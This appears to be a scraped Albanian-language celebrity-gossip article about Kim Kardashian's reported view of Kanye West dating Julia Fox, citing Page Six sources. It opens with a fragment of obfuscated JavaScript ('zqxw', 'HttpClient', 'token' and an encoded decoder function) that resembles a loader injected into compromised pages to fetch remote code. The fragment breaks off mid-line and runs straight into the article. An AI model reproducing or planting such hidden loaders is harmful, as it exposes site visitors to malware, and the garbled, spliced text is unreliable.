;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

E dashura e Kanye West është fanse e Kim Kardashian! Si ndihet Kim për këtë?

By

Kim Kardashian, lidhjen e Julia Fox me Kanye West, e sheh më tepër të mirë sesa rrënqethëse.

Burimet thonë për Page Six, se Kim është e kënaqur që Kanye West, zgjodhi një fanse në vend të një kritike-je për të dashur.

“Ajo e vlerëson që Julia e admiron atë dhe familjen e saj – dhe do ta preferonte më mirë këtë në vend të dikujt që urrej”, tha një burim për Page Six.

Fox – e dashura e re e West, e cila luajti në filmin e suksesshëm “Uncut Gems” – e ka përshkruar veten si një “super fanse” të klanit Kardashian, madje ka thënë, “Unë doja që ata të ishin familja ime”.

Por Fox e minimizoi admirimin e saj për familjen e realitetit televiziv në një episod të ri të podcast-it të lansuar të enjten.

“Unë nuk jam si një fanse që qëndroj në radhë në të ftohtë, për shembull, për një hapje dyqani. Unë madje nuk kam as një komplet buzësh nga Kylie Jenner”, ajo tha.

Ndërkohë, burimet thanë se Kardashian është në dijeni, por e patrazuar nga muhabetet që krahasojnë Fox-in me të.

“Kim nuk shqetësohet nga mënyra se si Kanye po i afrohet Julias me rimodelime, rroba, duke u veshur me të njëjtat stilistë”, tha një burim tjetër më parë për Page Six.

“Kim pëlqen ta shohë Kanye-n të lumtur dhe dëshiron vetëm gjëra pozitive për të, sepse kjo është më e mira për fëmijët dhe marrëdhëniet e tyre si prindër”, përfundoi burimi.

Artikuj të ngjashëm